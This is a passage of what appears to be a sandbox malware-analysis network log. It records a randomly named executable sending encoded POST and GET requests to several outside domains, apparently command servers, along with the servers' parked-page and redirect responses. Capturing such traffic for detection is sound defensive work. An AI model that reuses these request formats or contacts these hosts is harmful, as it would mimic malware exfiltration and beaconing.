                                                                                                                                            Oct 22, 2024 13:28:42.316083908 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2M5ZDY3OWItNzhmMC00NDQ0LTkxNzItMTE2ZThjYThmYzJiIiwicGFnZV90aW1lIjoxNzI5NTk2NT


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.549993199.59.243.22780764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:44.243376017 CEST435OUTGET /rod1/?vd=fhUlwfGxBn-tt&-v4puN=625sgw1Vn/LiYNFkuNXWgUQa6VpWz6NoZgO4nBFbZUGQF7cSiahkAd5Np5VrTvFPZWnEzDVMZ2bBqmHKU8WTD6xVXOOHKx/2RY/6WwAhCi5V31VMR0XJVnQWnK4Gp4bSPg== HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:44.868266106 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:44 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1518
                                                                                                                                            x-request-id: bab4616a-4c7c-44ac-b2a3-729c58cc3017
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kFPoV5Jp3JkIGuNBgwCmsH+juodcp2L4lvG5oqomg770LDlwEqRpm+1c9hhl/oELI7LMRYnEaibFMWHzuHrtOw==
                                                                                                                                            set-cookie: parking_session=bab4616a-4c7c-44ac-b2a3-729c58cc3017; expires=Tue, 22 Oct 2024 11:43:44 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 46 50 6f 56 35 4a 70 33 4a 6b 49 47 75 4e 42 67 77 43 6d 73 48 2b 6a 75 6f 64 63 70 32 4c 34 6c 76 47 35 6f 71 6f 6d 67 37 37 30 4c 44 6c 77 45 71 52 70 6d 2b 31 63 39 68 68 6c 2f 6f 45 4c 49 37 4c 4d 52 59 6e 45 61 69 62 46 4d 57 48 7a 75 48 72 74 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kFPoV5Jp3JkIGuNBgwCmsH+juodcp2L4lvG5oqomg770LDlwEqRpm+1c9hhl/oELI7LMRYnEaibFMWHzuHrtOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                            Oct 22, 2024 13:28:44.868330956 CEST971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmFiNDYxNmEtNGM3Yy00NGFjLWIyYTMtNzI5YzU4Y2MzMDE3IiwicGFnZV90aW1lIjoxNzI5NTk2NT


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.54999413.248.169.4880764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:49.957240105 CEST673OUTPOST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 65 55 32 78 75 36 50 74 58 6e 70 49 72 72 4d 47 66 30 38 61 42 33 51 4b 42 65 33 45 64 43 48 58 5a 57 4a 4b 78 57 4b 42 35 6f 4d 31 41 33 71 45 75 36 66 50 38 6e 42 57 49 36 33 6d 53 32 70 42 2b 68 38 4e 64 75 6a 2b 6d 39 54 54 41 4c 44 7a 76 35 6e 79 50 74 35 78 57 47 34 31 39 76 61 4c 49 57 4a 59 76 38 56 70 51 70 79 49 56 78 32 77 50 69 7a 69 50 46 78 52 39 69 66 73 6d 63 62 4c 75 36 65 6f 6c 71 6b 77 64 35 32 70 48 49 46 2f 32 75 52 6a 6a 49 63 79 74 65 41 73 4a 69 67 4a 2b 70 5a 66 78 4f 55 78 76 72 6c 38 39 4f 57 4b 62 6b 6b 63 4a 46 74 30 67 78 58 58 6c 51 71 71 54 4d 2b 6f 2b 66 77 3d
                                                                                                                                            Data Ascii: -v4puN=eU2xu6PtXnpIrrMGf08aB3QKBe3EdCHXZWJKxWKB5oM1A3qEu6fP8nBWI63mS2pB+h8Nduj+m9TTALDzv5nyPt5xWG419vaLIWJYv8VpQpyIVx2wPiziPFxR9ifsmcbLu6eolqkwd52pHIF/2uRjjIcyteAsJigJ+pZfxOUxvrl89OWKbkkcJFt0gxXXlQqqTM+o+fw=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.54999513.248.169.4880764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:52.649250984 CEST693OUTPOST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 65 55 32 78 75 36 50 74 58 6e 70 49 72 49 55 47 63 58 55 61 48 58 51 4c 4b 2b 33 45 55 69 48 62 5a 57 56 4b 78 58 2b 52 35 65 6b 31 44 57 61 45 76 37 66 50 35 6e 42 57 41 61 33 70 57 32 70 30 2b 68 77 6a 64 72 44 2b 6d 2b 76 54 41 4c 54 7a 75 49 6e 39 4f 39 35 7a 64 6d 35 54 7a 50 61 4c 49 57 4a 59 76 34 46 50 51 70 71 49 56 42 47 77 4f 48 54 68 4d 46 78 53 31 43 66 73 69 63 62 50 75 36 65 4f 6c 72 4a 56 64 36 65 70 48 4b 4e 2f 32 38 70 67 6f 49 63 77 69 2b 42 44 59 69 67 48 38 35 56 69 34 4e 78 45 2b 74 77 49 31 59 6e 67 42 47 73 30 61 6c 42 4d 77 69 66 67 30 67 4c 44 4a 76 75 59 67 49 6c 70 43 56 49 36 2f 64 4e 4f 50 4f 65 37 52 6b 4c 70 59 61 67 66
                                                                                                                                            Data Ascii: -v4puN=eU2xu6PtXnpIrIUGcXUaHXQLK+3EUiHbZWVKxX+R5ek1DWaEv7fP5nBWAa3pW2p0+hwjdrD+m+vTALTzuIn9O95zdm5TzPaLIWJYv4FPQpqIVBGwOHThMFxS1CfsicbPu6eOlrJVd6epHKN/28pgoIcwi+BDYigH85Vi4NxE+twI1YngBGs0alBMwifg0gLDJvuYgIlpCVI6/dNOPOe7RkLpYagf


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.54999613.248.169.4880764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:55.200300932 CEST1710OUTPOST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 65 55 32 78 75 36 50 74 58 6e 70 49 72 49 55 47 63 58 55 61 48 58 51 4c 4b 2b 33 45 55 69 48 62 5a 57 56 4b 78 58 2b 52 35 65 63 31 44 6b 53 45 74 59 33 50 2b 6e 42 57 4b 36 33 71 57 32 70 54 2b 68 6f 76 64 72 47 4c 6d 37 72 54 42 6f 4c 7a 6e 61 50 39 48 39 35 7a 53 47 34 30 39 76 61 6b 49 58 6c 63 76 38 68 50 51 70 71 49 56 43 65 77 65 69 7a 68 4b 46 78 52 39 69 66 61 6d 63 62 33 75 36 47 77 6c 72 4d 67 64 72 2b 70 47 70 6c 2f 30 4a 46 67 6c 49 63 32 6e 2b 42 62 59 69 74 46 38 35 49 54 34 4d 46 71 2b 71 45 49 6c 49 72 33 46 6d 6f 53 4d 7a 42 58 39 41 7a 52 6c 6d 50 77 44 50 4b 50 6e 62 64 50 4a 45 74 53 77 49 5a 51 63 73 6e 54 51 7a 47 34 52 71 56 4a 53 70 6c 54 2b 6f 69 44 37 6f 79 30 30 6c 4f 59 4a 55 6d 64 4c 65 48 50 72 79 73 6c 64 41 6f 4f 78 4e 4a 30 6c 38 54 6b 7a 4f 63 6f 54 68 53 78 46 70 41 43 30 53 38 79 68 41 73 50 70 78 7a 35 75 35 54 4d 36 45 73 4f 30 30 76 47 66 74 48 4f 38 32 6d 6b 6d 38 6e 46 67 65 39 65 4b 52 32 6e 4d 47 47 68 4e 34 5a 6f 44 73 6a 2b 67 66 44 [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=eU2xu6PtXnpIrIUGcXUaHXQLK+3EUiHbZWVKxX+R5ec1DkSEtY3P+nBWK63qW2pT+hovdrGLm7rTBoLznaP9H95zSG409vakIXlcv8hPQpqIVCeweizhKFxR9ifamcb3u6GwlrMgdr+pGpl/0JFglIc2n+BbYitF85IT4MFq+qEIlIr3FmoSMzBX9AzRlmPwDPKPnbdPJEtSwIZQcsnTQzG4RqVJSplT+oiD7oy00lOYJUmdLeHPrysldAoOxNJ0l8TkzOcoThSxFpAC0S8yhAsPpxz5u5TM6EsO00vGftHO82mkm8nFge9eKR2nMGGhN4ZoDsj+gfDWNl4P1AIY/Pdp/2pw827dxp3OaAh997uyzR2tLn8YPXPI5ZtOAqzVFlXQXT3UqFNUtbN1ULB0tw+39a1q6EsT3D28gIKtn54IFu+0K+QshVVH1QdIhqNEH5etSCT4w/Xm7oXhedN3+3g1Lv+AxixtOsMxoCNNB+MI+f9056/fb4IQiAEc/Q8nlWaOfVqQUKTzKIvL+hTWVSy+FDWAoDhiASYnHQycsoDiIzwqCf4hF1BBCOdezyiz7p8zfnFbe+ukq6zITB88+hRFBR8r44aGok/MfEquBG01/yWnzP917KKppKoNpCF6fi2LsQGMJc8ZQyiSWTkqhhGDQmAx1AZYIMGZA2RM142HvkAqUdSSrDsyg74hRuFnYfvMdqUG+liQmxf88KdK8Pj6FUt8Dtt928bMdurLMVUI9WFJiAFne+CyZuEXvftFvSW09VIVHflhsTSoPELkujBg5+9WwvyZ71wPT2B8B0SjW1NUNjs8916TBbtdrZ0SShZohMV+VMjN+COYlBAGiJXkHHXpU1fubhAZ+LgZpi7Pw5C1seg1+3w+i0sDYcvEjiFdBnpEj5f9aXgYBN94KsCJK2c26TeFv4oHCf1J7MAU17RxmvkaSopCQOoqJGwerj63J1K46sqD9zSVez6WHAjo/WmLXWDOkMKn/QkZ8yw/n [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.54999713.248.169.4880764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:57.748194933 CEST426OUTGET /t4fd/?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:58.410136938 CEST411INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 76 34 70 75 4e 3d 54 57 65 52 74 4e 7a 4d 66 6d 4e 45 76 64 63 58 62 57 6b 4d 48 6e 4a 2f 46 36 66 6c 63 6a 72 2f 65 6c 38 7a 75 6d 7a 37 31 5a 6f 56 41 30 4f 4a 75 2f 6e 35 6f 52 78 53 47 64 65 64 63 47 5a 46 72 44 34 79 51 74 79 48 32 37 2f 7a 4e 70 2f 77 73 35 2b 4d 44 4e 52 65 66 55 52 5a 7a 36 79 49 4c 51 56 33 73 63 59 58 51 71 36 34 5a 68 2f 71 44 69 50 36 45 41 74 72 38 51 48 59 6b 4f 75 41 36 77 3d 3d 26 76 64 3d 66 68 55 6c 77 66 47 78 42 6e 2d 74 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt"}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            21192.168.2.5499983.33.130.19080
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:29:03.930412054 CEST694OUTPOST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 67 63 58 2b 78 38 32 32 68 6d 71 58 72 56 6d 77 69 71 44 55 63 49 52 66 6e 53 76 74 7a 52 6b 68 4d 61 2b 75 36 37 4d 32 32 61 33 31 51 72 79 49 30 6b 35 55 4b 4e 6d 42 57 35 37 51 58 57 32 4a 34 68 4e 71 56 50 5a 68 64 76 50 77 63 32 30 7a 65 32 41 46 6d 6f 6b 33 78 71 61 59 71 63 4b 4b 49 78 62 2b 6a 51 35 48 43 68 56 71 52 2f 64 30 49 73 6b 6f 43 66 41 70 5a 64 52 63 2b 43 34 33 4a 37 34 2f 4e 72 4b 51 35 45 6f 34 62 2f 66 79 67 62 6e 59 64 4c 65 31 45 52 42 75 46 4b 56 6e 42 45 30 78 71 7a 65 6e 62 31 6e 54 58 76 36 49 7a 4d 75 78 4e 51 64 66 58 74 35 69 4f 78 6f 35 61 66 45 34 78 74 34 3d
                                                                                                                                            Data Ascii: -v4puN=gcX+x822hmqXrVmwiqDUcIRfnSvtzRkhMa+u67M22a31QryI0k5UKNmBW57QXW2J4hNqVPZhdvPwc20ze2AFmok3xqaYqcKKIxb+jQ5HChVqR/d0IskoCfApZdRc+C43J74/NrKQ5Eo4b/fygbnYdLe1ERBuFKVnBE0xqzenb1nTXv6IzMuxNQdfXt5iOxo5afE4xt4=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            22192.168.2.5499993.33.130.19080
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:29:06.483345985 CEST714OUTPOST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 67 63 58 2b 78 38 32 32 68 6d 71 58 71 30 57 77 6b 4a 72 55 61 6f 52 65 6f 79 76 74 39 42 6b 39 4d 61 69 75 36 36 49 6d 31 6f 6a 31 51 4c 43 49 31 67 56 55 4c 4e 6d 42 64 5a 37 66 4b 47 32 4f 34 68 42 4d 56 4b 78 68 64 76 72 77 63 79 77 7a 65 47 38 47 6d 34 6b 31 38 4b 61 61 6b 38 4b 4b 49 78 62 2b 6a 51 64 39 43 68 4e 71 52 4f 74 30 49 4e 6b 72 64 76 41 71 50 4e 52 63 31 69 34 37 4a 37 34 42 4e 71 58 33 35 48 41 34 62 36 6a 79 67 4f 54 62 45 62 65 76 4c 78 41 41 41 34 59 64 42 48 6b 35 6c 6a 76 32 46 47 44 79 66 35 4c 69 70 75 6d 5a 65 77 78 6e 48 2b 78 56 66 42 4a 51 41 38 55 49 76 36 73 58 44 55 6c 59 5a 53 59 4e 6f 41 73 67 70 46 35 2f 44 57 6d 53
                                                                                                                                            Data Ascii: -v4puN=gcX+x822hmqXq0WwkJrUaoReoyvt9Bk9Maiu66Im1oj1QLCI1gVULNmBdZ7fKG2O4hBMVKxhdvrwcywzeG8Gm4k18Kaak8KKIxb+jQd9ChNqROt0INkrdvAqPNRc1i47J74BNqX35HA4b6jygOTbEbevLxAAA4YdBHk5ljv2FGDyf5LipumZewxnH+xVfBJQA8UIv6sXDUlYZSYNoAsgpF5/DWmS


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            23192.168.2.5500003.33.130.19080
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:29:09.029290915 CEST1731OUTPOST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 67 63 58 2b 78 38 32 32 68 6d 71 58 71 30 57 77 6b 4a 72 55 61 6f 52 65 6f 79 76 74 39 42 6b 39 4d 61 69 75 36 36 49 6d 31 6f 62 31 51 35 4b 49 30 42 56 55 4d 4e 6d 42 51 35 37 4c 4b 47 33 53 34 68 4a 41 56 4b 38 61 64 74 44 77 63 52 6f 7a 59 30 59 47 6f 34 6b 31 67 36 61 58 71 63 4c 43 49 78 4c 79 6a 51 74 39 43 68 4e 71 52 4d 31 30 4f 63 6b 72 4f 2f 41 70 5a 64 52 59 2b 43 34 66 4a 36 52 36 4e 70 37 4e 35 58 67 34 62 62 54 79 6a 38 37 62 4d 62 65 70 49 78 41 75 41 34 55 34 42 48 34 66 6c 6a 71 68 46 46 54 79 63 63 69 32 31 4e 47 44 4d 52 78 52 55 63 4d 31 4a 6c 39 54 48 38 4d 47 75 62 67 4a 49 6d 56 51 4d 58 6b 5a 6c 7a 67 73 74 43 46 37 46 7a 58 7a 6e 49 48 6d 4b 4b 2b 48 50 5a 35 70 76 6a 71 71 36 53 30 67 4c 55 56 57 6d 50 42 61 57 6a 31 55 55 33 6d 59 4c 6f 34 6f 33 48 34 4a 78 6e 34 78 35 69 51 79 41 2b 55 78 6f 6b 31 46 4b 4f 35 61 47 68 65 32 35 63 30 61 6a 34 66 42 6b 68 52 48 70 69 53 63 36 42 37 35 30 53 6b 58 7a 67 62 7a 4f 31 4d 53 4e 7a 51 59 43 78 33 4d 56 57 52 [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=gcX+x822hmqXq0WwkJrUaoReoyvt9Bk9Maiu66Im1ob1Q5KI0BVUMNmBQ57LKG3S4hJAVK8adtDwcRozY0YGo4k1g6aXqcLCIxLyjQt9ChNqRM10OckrO/ApZdRY+C4fJ6R6Np7N5Xg4bbTyj87bMbepIxAuA4U4BH4fljqhFFTycci21NGDMRxRUcM1Jl9TH8MGubgJImVQMXkZlzgstCF7FzXznIHmKK+HPZ5pvjqq6S0gLUVWmPBaWj1UU3mYLo4o3H4Jxn4x5iQyA+Uxok1FKO5aGhe25c0aj4fBkhRHpiSc6B750SkXzgbzO1MSNzQYCx3MVWRRvsG6I/dm2hPzkmzujb4rvOxPWLO0MPmmNwsmX/ifin+W+f14j29Ec3a0IOrnEHm6BWnm8dy9v1q0/PyzjvugwK2UX6/tuKiuEH/YxEu+eXSaucJ0j511fSfNL3LIptdoFTr9w6kTUWGPNXtZzOn4WJHsQi4rg9ERzPOq4pX9fFdQd2D+keIxUwUgucnaXBAwircy2mEQ15VzfHtiCpPM7H2ur7S9cx50gnj9yhrNyU4/Cv4jEdQI+rNj7ylzc8FzaUdDnoUb7VqB4usEj/hKjfsXcnnrGMkzOUb5aUo1ipNLiZmZjn+YrWD5S9Mzx+fWiJc3sgFPZzH+/SbOOnPmNXZaBQHQiB2UwEoKKSvZLiz2oCGyqdI+DiIwtBBZeb6q+yQ831cF71Ct4KmNXk1nRB3nS4chmUPyc3hAgzz45kX7CqYFqQmBbvJKocGVQwS72b/wzWYHSJAupQN5OodIEkcCzDN1NtMNL5T4gHYaUspMZU/3LxEMvM6ijnvs4FjeJo0tYi5cNURYWbi5swuLFP4LFcratX3naGZlZ7cwpqrqhW/2TGQ2OynnnRY5hw67mi/uiZFJaGzQC5TJBG4VGQekbN5/1lFRgI0sp++ZqD0vh6v/rhurfVnFl4ivs6Et31Oy1gTl5By1OOADz6BYBsIK9K1XWxjU9 [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            24192.168.2.5500013.33.130.19080
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:29:11.569258928 CEST433OUTGET /bx4s/?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:29:12.188291073 CEST411INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:29:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
